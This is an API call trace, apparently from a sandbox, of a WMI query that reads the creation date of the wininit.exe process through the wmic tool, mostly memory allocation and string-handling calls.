[0401.640] malloc (_Size=0x18) returned 0x209720
[0401.640] SysStringLen (param_1="SELECT ") returned 0x7
[0401.640] SysStringLen (param_1="creationdate") returned 0xc
[0401.640] memcpy (in: _Dst=0x2e95b8, _Src=0x2c84f8, _Size=0x10 | out: _Dst=0x2e95b8) returned 0x2e95b8
[0401.640] memcpy (in: _Dst=0x2e95c6, _Src=0x2e9478, _Size=0x1a | out: _Dst=0x2e95c6) returned 0x2e95c6
[0401.641] malloc (_Size=0x18) returned 0x209740
[0401.641] SysStringLen (param_1="SELECT creationdate") returned 0x13
[0401.641] SysStringLen (param_1=" FROM ") returned 0x6
[0401.641] memcpy (in: _Dst=0x2c6638, _Src=0x2e95b8, _Size=0x28 | out: _Dst=0x2c6638) returned 0x2c6638
[0401.641] memcpy (in: _Dst=0x2c665e, _Src=0x2e4c58, _Size=0xe | out: _Dst=0x2c665e) returned 0x2c665e
[0401.641] malloc (_Size=0x18) returned 0x209780
[0401.641] SysStringLen (param_1="SELECT creationdate FROM ") returned 0x19
[0401.641] SysStringLen (param_1="Win32_Process") returned 0xd
[0401.641] memcpy (in: _Dst=0x2a6ed8, _Src=0x2c6638, _Size=0x34 | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0401.641] memcpy (in: _Dst=0x2a6f0a, _Src=0x2c6228, _Size=0x1c | out: _Dst=0x2a6f0a) returned 0x2a6f0a
[0401.641] free (_Block=0x209640)
[0401.641] free (_Block=0x209740)
[0401.642] free (_Block=0x209720)
[0401.642] free (_Block=0x209680)
[0401.642] free (_Block=0x2096e0)
[0401.642] malloc (_Size=0x18) returned 0x2096e0
[0401.642] malloc (_Size=0x18) returned 0x209680
[0401.642] lstrlenA (lpString=" WHERE ") returned 7
[0401.642] malloc (_Size=0x10) returned 0x209720
[0401.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" WHERE ", cbMultiByte=-1, lpWideCharStr=0x209720, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8
[0401.642] free (_Block=0x209720)
[0401.642] malloc (_Size=0x18) returned 0x209720
[0401.642] SysStringLen (param_1=" WHERE ") returned 0x7
[0401.642] SysStringLen (param_1="name=\"wininit.exe\"") returned 0x12
[0401.643] memcpy (in: _Dst=0x2c6688, _Src=0x2e4d18, _Size=0x10 | out: _Dst=0x2c6688) returned 0x2c6688
[0401.643] memcpy (in: _Dst=0x2c6696, _Src=0x2c6638, _Size=0x26 | out: _Dst=0x2c6696) returned 0x2c6696
[0401.643] malloc (_Size=0x18) returned 0x209740
[0401.643] SysStringLen (param_1="SELECT creationdate FROM Win32_Process") returned 0x26
[0401.643] SysStringLen (param_1=" WHERE name=\"wininit.exe\"") returned 0x19
[0401.643] memcpy (in: _Dst=0x2c8f28, _Src=0x2a6ed8, _Size=0x4e | out: _Dst=0x2c8f28) returned 0x2c8f28
[0401.643] memcpy (in: _Dst=0x2c8f74, _Src=0x2c6688, _Size=0x34 | out: _Dst=0x2c8f74) returned 0x2c8f74
[0401.643] free (_Block=0x209780)
[0401.643] free (_Block=0x209720)
[0401.643] free (_Block=0x209680)
[0401.643] free (_Block=0x2096e0)
[0401.644] ??0CHString@@QEAA@XZ () returned 0x16b4b0
[0401.644] GetCurrentThreadId () returned 0xdf0
[0401.644] CoCreateInstance (in: rclsid=0xffa373d0*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa373e0*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0xffaa29c0 | out: ppv=0xffaa29c0*=0x33e830) returned 0x0
[0401.682] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.682] ??0CHString@@QEAA@XZ () returned 0x16b4b0
[0401.682] GetCurrentThreadId () returned 0xdf0
[0401.682] malloc (_Size=0x18) returned 0x2096e0
[0401.682] malloc (_Size=0x18) returned 0x209680
[0401.682] malloc (_Size=0x18) returned 0x209720
[0401.682] malloc (_Size=0x18) returned 0x209780
[0401.682] malloc (_Size=0x18) returned 0x209640
[0401.683] SysStringLen (param_1="\\\\") returned 0x2
[0401.683] SysStringLen (param_1="Q9IATRKPRH") returned 0xa
[0401.683] memcpy (in: _Dst=0x2c6688, _Src=0x2e4c58, _Size=0x6 | out: _Dst=0x2c6688) returned 0x2c6688
[0401.683] memcpy (in: _Dst=0x2c668c, _Src=0x2c84f8, _Size=0x16 | out: _Dst=0x2c668c) returned 0x2c668c
[0401.683] malloc (_Size=0x18) returned 0x2097a0
[0401.683] SysStringLen (param_1="\\\\Q9IATRKPRH") returned 0xc
[0401.683] SysStringLen (param_1="\\") returned 0x1
[0401.683] memcpy (in: _Dst=0x2e95b8, _Src=0x2c6688, _Size=0x1a | out: _Dst=0x2e95b8) returned 0x2e95b8
[0401.683] memcpy (in: _Dst=0x2e95d0, _Src=0x2bf748, _Size=0x4 | out: _Dst=0x2e95d0) returned 0x2e95d0
[0401.683] malloc (_Size=0x18) returned 0x20ceb0
[0401.683] SysStringLen (param_1="\\\\Q9IATRKPRH\\") returned 0xd
[0401.683] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa
[0401.683] memcpy (in: _Dst=0x2c6638, _Src=0x2e95b8, _Size=0x1c | out: _Dst=0x2c6638) returned 0x2c6638
[0401.684] memcpy (in: _Dst=0x2c6652, _Src=0x2e4d18, _Size=0x16 | out: _Dst=0x2c6652) returned 0x2c6652
[0401.684] free (_Block=0x2097a0)
[0401.684] free (_Block=0x209640)
[0401.684] free (_Block=0x209780)
[0401.684] free (_Block=0x209720)
[0401.684] free (_Block=0x209680)
[0401.684] free (_Block=0x2096e0)
[0401.684] malloc (_Size=0x18) returned 0x2096e0
[0401.684] malloc (_Size=0x18) returned 0x209680
[0401.685] malloc (_Size=0x18) returned 0x209720
[0401.685] WbemLocator:IWbemLocator:ConnectServer (in: This=0x26cc20, strNetworkResource="\\\\Q9IATRKPRH\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffaa29d0 | out: ppNamespace=0xffaa29d0*=0x2d6710) returned 0x0
[0401.781] free (_Block=0x209720)
[0401.781] free (_Block=0x209680)
[0401.781] free (_Block=0x2096e0)
[0401.781] CoSetProxyBlanket (pProxy=0x2d6710, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0401.782] free (_Block=0x20ceb0)
[0401.782] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.782] ??0CHString@@QEAA@XZ () returned 0x16b3c0
[0401.782] GetCurrentThreadId () returned 0xdf0
[0401.782] free (_Block=0x209760)
[0401.782] malloc (_Size=0x18) returned 0x209760
[0401.782] ??0CHString@@QEAA@XZ () returned 0x16b370
[0401.782] GetCurrentThreadId () returned 0xdf0
[0401.782] CoCreateInstanceEx (in: Clsid=0xffa373b0*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0x16b320 | out: pResults=((pIID=0xffa37380*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x2c8dd0, hr=0x0))) returned 0x0
[0401.790] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.790] malloc (_Size=0x18) returned 0x2096e0
[0401.790] IWbemServices:ExecQuery (in: This=0x2d6710, strQueryLanguage="WQL", strQuery="SELECT creationdate FROM Win32_Process WHERE name=\"wininit.exe\"", lFlags=48, pCtx=0x0, ppEnum=0x16b3d0 | out: ppEnum=0x16b3d0*=0x33f4c0) returned 0x0
[0406.473] free (_Block=0x2096e0)
[0406.473] malloc (_Size=0x18) returned 0x2096e0
[0406.473] WbemContext:IWbemContext:SetValue (This=0x2c8dd0, wszName="ExcludeSystemProperties", lFlags=0, pValue=0x16b430*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0
[0406.474] free (_Block=0x2096e0)
[0406.474] CoSetProxyBlanket (pProxy=0x33f4c0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0406.484] IEnumWbemClassObject:Next (in: This=0x33f4c0, lTimeout=-1, uCount=0x1, apObjects=0x16b3d8, puReturned=0x16b3f0 | out: apObjects=0x16b3d8*=0x33a370, puReturned=0x16b3f0*=0x1) returned 0x0
[0406.487] WbemObjectTextSrc:IWbemObjectTextSrc:GetText (in: This=0x33e830, lFlags=0, pObj=0x33a370, uObjTextFormat=0x1, pCtx=0x2c8dd0, strText=0x16b3e0 | out: strText=0x16b3e0*="20240119140101.223600+060") returned 0x0
[0406.525] malloc (_Size=0x18) returned 0x2096e0
[0406.525] malloc (_Size=0x18) returned 0x209680
[0406.525] SysStringLen (param_1="") returned 0x5
[0406.526] SysStringLen (param_1="20240119140101.223600+060") returned 0x90
[0406.526] memcpy (in: _Dst=0x336358, _Src=0x2e4c58, _Size=0xc | out: _Dst=0x336358) returned 0x336358
[0406.526] memcpy (in: _Dst=0x336362, _Src=0x334728, _Size=0x122 | out: _Dst=0x336362) returned 0x336362
[0406.526] free (_Block=0x209760)
[0406.526] free (_Block=0x2096e0)
[0406.526] IUnknown:Release (This=0x33a370) returned 0x0
[0406.527] IEnumWbemClassObject:Next (in: This=0x33f4c0, lTimeout=-1, uCount=0x1, apObjects=0x16b3d8, puReturned=0x16b3f0 | out: apObjects=0x16b3d8*=0x0, puReturned=0x16b3f0*=0x0) returned 0x1
[0406.529] malloc (_Size=0x18) returned 0x2096e0
[0406.529] malloc (_Size=0x18) returned 0x209760
[0406.529] SysStringLen (param_1="20240119140101.223600+060") returned 0x95
[0406.529] SysStringLen (param_1="") returned 0x6
[0406.529] memcpy (in: _Dst=0x3364a8, _Src=0x336358, _Size=0x12c | out: _Dst=0x3364a8) returned 0x3364a8
[0406.529] memcpy (in: _Dst=0x3365d2, _Src=0x334bb8, _Size=0xe | out: _Dst=0x3365d2) returned 0x3365d2
[0406.530] free (_Block=0x209680)
[0406.530] free (_Block=0x2096e0)
[0406.530] free (_Block=0x209760)
[0406.530] malloc (_Size=0x18) returned 0x209760
[0406.530] IUnknown:Release (This=0x33f4c0) returned 0x0
[0406.534] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0406.535] free (_Block=0x209760)
[0406.535] free (_Block=0x209740)
[0406.535] free (_Block=0x209580)
[0406.535] free (_Block=0x209700)
[0406.535] malloc (_Size=0x18) returned 0x209700
[0406.535] malloc (_Size=0x18) returned 0x209580
[0406.535] SysStringLen (param_1="") returned 0x1b
[0406.535] SysStringLen (param_1="20240119140101.223600+060") returned 0x9b
[0406.536] memcpy (in: _Dst=0x3349a8, _Src=0x2c62c8, _Size=0x38 | out: _Dst=0x3349a8) returned 0x3349a8
[0406.536] memcpy (in: _Dst=0x3349de, _Src=0x3364a8, _Size=0x138 | out: _Dst=0x3349de) returned 0x3349de
[0406.536] free (_Block=0x2096c0)
[0406.536] free (_Block=0x209700)
[0406.536] malloc (_Size=0x18) returned 0x209700
[0406.536] malloc (_Size=0x18) returned 0x2096c0
[0406.536] SysStringLen (param_1="20240119140101.223600+060") returned 0xb6
[0406.536] SysStringLen (param_1="") returned 0xa
[0406.536] memcpy (in: _Dst=0x33fd58, _Src=0x3349a8, _Size=0x16e | out: _Dst=0x33fd58) returned 0x33fd58
[0406.536] memcpy (in: _Dst=0x33fec4, _Src=0x334bb8, _Size=0x16 | out: _Dst=0x33fec4) returned 0x33fec4
[0406.537] free (_Block=0x209580)
[0406.537] free (_Block=0x209700)
[0406.537] ??0CHString@@QEAA@XZ () returned 0x16f660
[0406.537] malloc (_Size=0x18) returned 0x209700
[0406.537] malloc (_Size=0x20) returned 0x20ceb0
[0406.537] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x334bb8, _SourceSize=0x14 | out: _Destination=0x20ceb0) returned 0x0
[0406.537] lstrlenW (lpString="&") returned 1
[0406.538] lstrlenW (lpString="&amp;") returned 5
[0406.538] lstrlenW (lpString="<") returned 1
[0406.538] lstrlenW (lpString="&lt;") returned 4
[0406.538] lstrlenW (lpString=">") returned 1
[0406.538] lstrlenW (lpString="&gt;") returned 4
[0406.538] lstrlenW (lpString="'") returned 1
[0406.538] lstrlenW (lpString="&apos;") returned 6
[0406.538] lstrlenW (lpString="\"") returned 1
[0406.538] lstrlenW (lpString="&quot;") returned 6
[0406.538] malloc (_Size=0x18) returned 0x209580
[0406.538] free (_Block=0x209700)
[0406.538] free (_Block=0x20ceb0)
[0406.538] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20d68c
[0406.539] malloc (_Size=0x18) returned 0x209700
[0406.539] free (_Block=0x2095a0)
[0406.539] free (_Block=0x209580)
[0406.539] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.539] ??0CHString@@QEAA@XZ () returned 0x16f658
[0406.539] malloc (_Size=0x18) returned 0x209580
[0406.539] malloc (_Size=0x18) returned 0x2095a0
[0406.539] malloc (_Size=0x70) returned 0x20d680
[0406.539] memcpy_s (in: _Destination=0x20d680, _DestinationSize=0x6e, _Source=0x2e05b8, _SourceSize=0x68 | out: _Destination=0x20d680) returned 0x0
[0406.539] lstrlenW (lpString="&") returned 1
[0406.540] lstrlenW (lpString="&amp;") returned 5
[0406.540] lstrlenW (lpString="<") returned 1
[0406.540] lstrlenW (lpString="&lt;") returned 4
[0406.540] lstrlenW (lpString=">") returned 1
[0406.540] lstrlenW (lpString="&gt;") returned 4
[0406.540] lstrlenW (lpString="'") returned 1
[0406.540] lstrlenW (lpString="&apos;") returned 6
[0406.540] lstrlenW (lpString="\"") returned 1
[0406.540] lstrlenW (lpString="&quot;") returned 6
[0406.540] malloc (_Size=0xa6) returned 0x20d700
[0406.540] memcpy_s (in: _Destination=0x20d700, _DestinationSize=0xa6, _Source=0x20d680, _SourceSize=0x68 | out: _Destination=0x20d700) returned 0x0
[0406.540] free (_Block=0x20d680)
[0406.540] memmove_s (in: _Destination=0x20d736, _DestinationSize=0x6e, _Source=0x20d72c, _SourceSize=0x3c | out: _Destination=0x20d736) returned 0x0
[0406.541] memcpy_s (in: _Destination=0x20d72a, _DestinationSize=0x7a, _Source=0xffa36098, _SourceSize=0xc | out: _Destination=0x20d72a) returned 0x0
[0406.541] memmove_s (in: _Destination=0x20d758, _DestinationSize=0x4c, _Source=0x20d74e, _SourceSize=0x24 | out: _Destination=0x20d758) returned 0x0
[0406.541] memcpy_s (in: _Destination=0x20d74c, _DestinationSize=0x58, _Source=0xffa36098, _SourceSize=0xc | out: _Destination=0x20d74c) returned 0x0
[0406.541] malloc (_Size=0x18) returned 0x209740
[0406.541] free (_Block=0x2095a0)
[0406.541] free (_Block=0x20d700)
[0406.541] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20d68c
[0406.541] malloc (_Size=0x18) returned 0x2095a0
[0406.541] malloc (_Size=0x18) returned 0x209760
[0406.541] SysStringLen (param_1="") returned 0x9
[0406.541] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x59
[0406.541] memcpy (in: _Dst=0x33fef8, _Src=0x334bb8, _Size=0x14 | out: _Dst=0x33fef8) returned 0x33fef8
[0406.542] memcpy (in: _Dst=0x33ff0a, _Src=0x2ee7b8, _Size=0xb4 | out: _Dst=0x33ff0a) returned 0x33ff0a
[0406.542] free (_Block=0x209580)
[0406.542] free (_Block=0x2095a0)
[0406.542] ??0CHString@@QEAA@XZ () returned 0x16f648
[0406.542] malloc (_Size=0x18) returned 0x2095a0
[0406.542] ??0CHString@@QEAA@XZ () returned 0x16f5d8
[0406.542] malloc (_Size=0x18) returned 0x209580
[0406.543] malloc (_Size=0x8) returned 0x207fa0
[0406.543] memmove_s (in: _Destination=0x207fa0, _DestinationSize=0x8, _Source=0x206690, _SourceSize=0x8 | out: _Destination=0x207fa0) returned 0x0
[0406.543] malloc (_Size=0x18) returned 0x2096e0
[0406.543] malloc (_Size=0x20) returned 0x20ceb0
[0406.543] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x2e4cb8, _SourceSize=0x14 | out: _Destination=0x20ceb0) returned 0x0
[0406.543] lstrlenW (lpString="&") returned 1
[0406.543] lstrlenW (lpString="&amp;") returned 5
[0406.543] lstrlenW (lpString="<") returned 1
[0406.543] lstrlenW (lpString="&lt;") returned 4
[0406.543] lstrlenW (lpString=">") returned 1
[0406.543] lstrlenW (lpString="&gt;") returned 4
[0406.543] lstrlenW (lpString="'") returned 1
[0406.543] lstrlenW (lpString="&apos;") returned 6
[0406.544] lstrlenW (lpString="\"") returned 1
[0406.544] lstrlenW (lpString="&quot;") returned 6
[0406.544] malloc (_Size=0x18) returned 0x209680
[0406.544] free (_Block=0x2096e0)
[0406.544] free (_Block=0x20ceb0)
[0406.544] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20da4c
[0406.544] malloc (_Size=0x18) returned 0x2096e0
[0406.544] malloc (_Size=0x18) returned 0x209720
[0406.544] SysStringLen (param_1="") returned 0xa
[0406.544] SysStringLen (param_1="Q9IATRKPRH") returned 0x17
[0406.544] memcpy (in: _Dst=0x2a6ed8, _Src=0x334bb8, _Size=0x16 | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0406.544] memcpy (in: _Dst=0x2a6eec, _Src=0x2c62c8, _Size=0x30 | out: _Dst=0x2a6eec) returned 0x2a6eec
[0406.545] free (_Block=0x209580)
[0406.545] free (_Block=0x2096e0)
[0406.545] malloc (_Size=0x18) returned 0x2096e0
[0406.545] malloc (_Size=0x18) returned 0x209580
[0406.545] SysStringLen (param_1="Q9IATRKPRH") returned 0x21
[0406.545] SysStringLen (param_1="") returned 0xb
[0406.545] memcpy (in: _Dst=0x2e05b8, _Src=0x2a6ed8, _Size=0x44 | out: _Dst=0x2e05b8) returned 0x2e05b8
[0406.545] memcpy (in: _Dst=0x2e05fa, _Src=0x2e4cb8, _Size=0x18 | out: _Dst=0x2e05fa) returned 0x2e05fa
[0406.545] free (_Block=0x209720)
[0406.545] free (_Block=0x2096e0)
[0406.546] free (_Block=0x209680)
[0406.546] free (_Block=0x207fa0)
[0406.546] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.546] malloc (_Size=0x18) returned 0x209680
[0406.546] SysStringLen (param_1="") returned 0x17
[0406.546] SysStringLen (param_1="Q9IATRKPRH") returned 0x2c
[0406.546] memcpy (in: _Dst=0x2ee7b8, _Src=0x2c68b8, _Size=0x30 | out: _Dst=0x2ee7b8) returned 0x2ee7b8
[0406.546] memcpy (in: _Dst=0x2ee7e6, _Src=0x2e05b8, _Size=0x5a | out: _Dst=0x2ee7e6) returned 0x2ee7e6
[0406.546] free (_Block=0x2095a0)
[0406.546] lstrlenW (lpString="LIST") returned 4
[0406.547] lstrlenW (lpString="get") returned 3
[0406.547] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0406.547] malloc (_Size=0x18) returned 0x2095a0
[0406.547] malloc (_Size=0x18) returned 0x2096e0
[0406.547] SysStringLen (param_1="Q9IATRKPRH") returned 0x43
[0406.547] SysStringLen (param_1="") returned 0x18
[0406.547] memcpy (in: _Dst=0x2ee888, _Src=0x2ee7b8, _Size=0x88 | out: _Dst=0x2ee888) returned 0x2ee888
[0406.547] memcpy (in: _Dst=0x2ee90e, _Src=0x2c62c8, _Size=0x32 | out: _Dst=0x2ee90e) returned 0x2ee90e
[0406.547] free (_Block=0x209680)
[0406.547] free (_Block=0x2095a0)
[0406.548] free (_Block=0x209580)
[0406.548] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0406.548] malloc (_Size=0x18) returned 0x209580
[0406.548] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x62
[0406.548] SysStringLen (param_1="Q9IATRKPRH") returned 0x5b
[0406.548] memcpy (in: _Dst=0x3342c8, _Src=0x33fef8, _Size=0xc6 | out: _Dst=0x3342c8) returned 0x3342c8
[0406.548] memcpy (in: _Dst=0x33438c, _Src=0x2ee888, _Size=0xb8 | out: _Dst=0x33438c) returned 0x33438c
[0406.548] free (_Block=0x209760)
[0406.548] ??0CHString@@QEAA@XZ () returned 0x16f5b0
[0406.549] malloc (_Size=0x18) returned 0x209760
[0406.549] malloc (_Size=0x18) returned 0x2095a0
[0406.549] malloc (_Size=0x18) returned 0x209680
[0406.549] malloc (_Size=0x18) returned 0x209720
[0406.549] malloc (_Size=0x18) returned 0x209780
[0406.549] malloc (_Size=0x18) returned 0x209640
[0406.549] malloc (_Size=0x18) returned 0x2097a0
[0406.549] malloc (_Size=0x18) returned 0x20da70
[0406.550] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0xc | out: _Destination=0x16f4b0) returned 0x0
[0406.550] lstrlenW (lpString="&") returned 1
[0406.550] lstrlenW (lpString="&amp;") returned 5
[0406.550] lstrlenW (lpString="<") returned 1
[0406.550] lstrlenW (lpString="&lt;") returned 4
[0406.550] lstrlenW (lpString=">") returned 1
[0406.550] lstrlenW (lpString="&gt;") returned 4
[0406.550] lstrlenW (lpString="'") returned 1
[0406.550] lstrlenW (lpString="&apos;") returned 6
[0406.550] lstrlenW (lpString="\"") returned 1
[0406.550] lstrlenW (lpString="&quot;") returned 6
[0406.550] malloc (_Size=0x18) returned 0x20da90
[0406.550] free (_Block=0x20da70)
[0406.551] malloc (_Size=0x18) returned 0x20da70
[0406.551] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0xc | out: _Destination=0x16f4b0) returned 0x0
[0406.551] lstrlenW (lpString="&") returned 1
[0406.551] lstrlenW (lpString="&amp;") returned 5
[0406.551] lstrlenW (lpString="<") returned 1
[0406.551] lstrlenW (lpString="&lt;") returned 4
[0406.551] lstrlenW (lpString=">") returned 1
[0406.551] lstrlenW (lpString="&gt;") returned 4
[0406.551] lstrlenW (lpString="'") returned 1
[0406.551] lstrlenW (lpString="&apos;") returned 6
[0406.551] lstrlenW (lpString="\"") returned 1
[0406.551] lstrlenW (lpString="&quot;") returned 6
[0406.551] malloc (_Size=0x18) returned 0x20dab0
[0406.552] free (_Block=0x20da70)
[0406.552] malloc (_Size=0x18) returned 0x20da70
[0406.552] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0x6 | out: _Destination=0x16f4b0) returned 0x0
[0406.552] lstrlenW (lpString="&") returned 1
[0406.552] lstrlenW (lpString="&amp;") returned 5
[0406.552] lstrlenW (lpString="<") returned 1
[0406.552] lstrlenW (lpString="&lt;") returned 4
[0406.552] lstrlenW (lpString=">") returned 1
[0406.552] lstrlenW (lpString="&gt;") returned 4
[0406.552] lstrlenW (lpString="'") returned 1
[0406.552] lstrlenW (lpString="&apos;") returned 6
[0406.552] lstrlenW (lpString="\"") returned 1
[0406.552] lstrlenW (lpString="&quot;") returned 6
[0406.553] malloc (_Size=0x18) returned 0x20dad0
[0406.553] free (_Block=0x20da70)
[0406.553] malloc (_Size=0x18) returned 0x20da70
[0406.553] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0x6 | out: _Destination=0x16f4b0) returned 0x0
[0406.553] lstrlenW (lpString="&") returned 1
[0406.553] lstrlenW (lpString="&amp;") returned 5
[0406.553] lstrlenW (lpString="<") returned 1
[0406.553] lstrlenW (lpString="&lt;") returned 4
[0406.553] lstrlenW (lpString=">") returned 1
[0406.553] lstrlenW (lpString="&gt;") returned 4
[0406.553] lstrlenW (lpString="'") returned 1
[0406.553] lstrlenW (lpString="&apos;") returned 6
[0406.553] lstrlenW (lpString="\"") returned 1
[0406.554] lstrlenW (lpString="&quot;") returned 6
[0406.554] malloc (_Size=0x18) returned 0x20daf0
[0406.554] free (_Block=0x20da70)
[0406.554] malloc (_Size=0x18) returned 0x20da70
[0406.554] malloc (_Size=0x20) returned 0x20ceb0
[0406.554] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x334be8, _SourceSize=0x14 | out: _Destination=0x20ceb0) returned 0x0
[0406.554] lstrlenW (lpString="&") returned 1
[0406.554] lstrlenW (lpString="&amp;") returned 5
[0406.554] lstrlenW (lpString="<") returned 1
[0406.554] lstrlenW (lpString="&lt;") returned 4
[0406.554] lstrlenW (lpString=">") returned 1
[0406.554] lstrlenW (lpString="&gt;") returned 4
[0406.554] lstrlenW (lpString="'") returned 1
[0406.555] lstrlenW (lpString="&apos;") returned 6
[0406.555] lstrlenW (lpString="\"") returned 1
[0406.555] lstrlenW (lpString="&quot;") returned 6
[0406.555] malloc (_Size=0x18) returned 0x20db10
[0406.555] free (_Block=0x20da70)
[0406.555] free (_Block=0x20ceb0)
[0406.555] malloc (_Size=0x18) returned 0x20da70
[0406.555] malloc (_Size=0x20) returned 0x20ceb0
[0406.555] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x334be8, _SourceSize=0x10 | out: _Destination=0x20ceb0) returned 0x0
[0406.555] lstrlenW (lpString="&") returned 1
[0406.555] lstrlenW (lpString="&amp;") returned 5
[0406.555] lstrlenW (lpString="<") returned 1
[0406.555] lstrlenW (lpString="&lt;") returned 4
[0406.556] lstrlenW (lpString=">") returned 1
[0406.556] lstrlenW (lpString="&gt;") returned 4
[0406.556] lstrlenW (lpString="'") returned 1
[0406.556] lstrlenW (lpString="&apos;") returned 6
[0406.556] lstrlenW (lpString="\"") returned 1
[0406.556] lstrlenW (lpString="&quot;") returned 6
[0406.556] malloc (_Size=0x18) returned 0x20db30
[0406.556] free (_Block=0x20da70)
[0406.556] free (_Block=0x20ceb0)
[0406.556] malloc (_Size=0x18) returned 0x20da70
[0406.557] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0xc | out: _Destination=0x16f4b0) returned 0x0
[0406.557] lstrlenW (lpString="&") returned 1
[0406.557] lstrlenW (lpString="&amp;") returned 5
[0406.557] lstrlenW (lpString="<") returned 1
[0406.557] lstrlenW (lpString="&lt;") returned 4
[0406.557] lstrlenW (lpString=">") returned 1
[0406.557] lstrlenW (lpString="&gt;") returned 4
[0406.557] lstrlenW (lpString="'") returned 1
[0406.557] lstrlenW (lpString="&apos;") returned 6
[0406.557] lstrlenW (lpString="\"") returned 1
[0406.557] lstrlenW (lpString="&quot;") returned 6
[0406.557] malloc (_Size=0x18) returned 0x20db50
[0406.558] free (_Block=0x20da70)
[0406.558] ?Format@CHString@@QEAAXPEBGZZ () returned 0x34dfdc
[0406.559] malloc (_Size=0x18) returned 0x20da70
[0406.559] ??1CHString@@QEAA@XZ () returned 0x6601
[0406.559] free (_Block=0x20db50)
[0406.559] free (_Block=0x20db30)
[0406.559] free (_Block=0x20db10)
[0406.559] free (_Block=0x2097a0)
[0406.560] free (_Block=0x20daf0)
[0406.560] free (_Block=0x20da90)
[0406.560] free (_Block=0x20dab0)
[0406.560] free (_Block=0x209640)
[0406.560] free (_Block=0x209780)
[0406.560] free (_Block=0x20dad0)
[0406.560] free (_Block=0x209720)
[0406.560] free (_Block=0x209680)
[0406.561] free (_Block=0x209760)
[0406.561] free (_Block=0x2095a0)
[0406.561] malloc (_Size=0x18) returned 0x2095a0
[0406.561] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRH") returned 0xbd
[0406.561] SysStringLen (param_1="root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x173
[0406.561] memcpy (in: _Dst=0x33f3e8, _Src=0x3342c8, _Size=0x17c | out: _Dst=0x33f3e8) returned 0x33f3e8
[0406.561] memcpy (in: _Dst=0x33f562, _Src=0x33cdc8, _Size=0x2e8 | out: _Dst=0x33f562) returned 0x33f562
[0406.561] free (_Block=0x209580)
[0406.561] malloc (_Size=0x18) returned 0x209580
[0406.562] malloc (_Size=0x18) returned 0x209760
[0406.562] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x230
[0406.562] SysStringLen (param_1="") returned 0xa
[0406.562] memcpy (in: _Dst=0x3365f8, _Src=0x33f3e8, _Size=0x462 | out: _Dst=0x3365f8) returned 0x3365f8
[0406.562] memcpy (in: _Dst=0x336a58, _Src=0x334be8, _Size=0x16 | out: _Dst=0x336a58) returned 0x336a58
[0406.562] free (_Block=0x2095a0)
[0406.562] free (_Block=0x209580)
[0406.562] free (_Block=0x209740)
[0406.562] free (_Block=0x2096e0)
[0406.562] free (_Block=0x20da70)
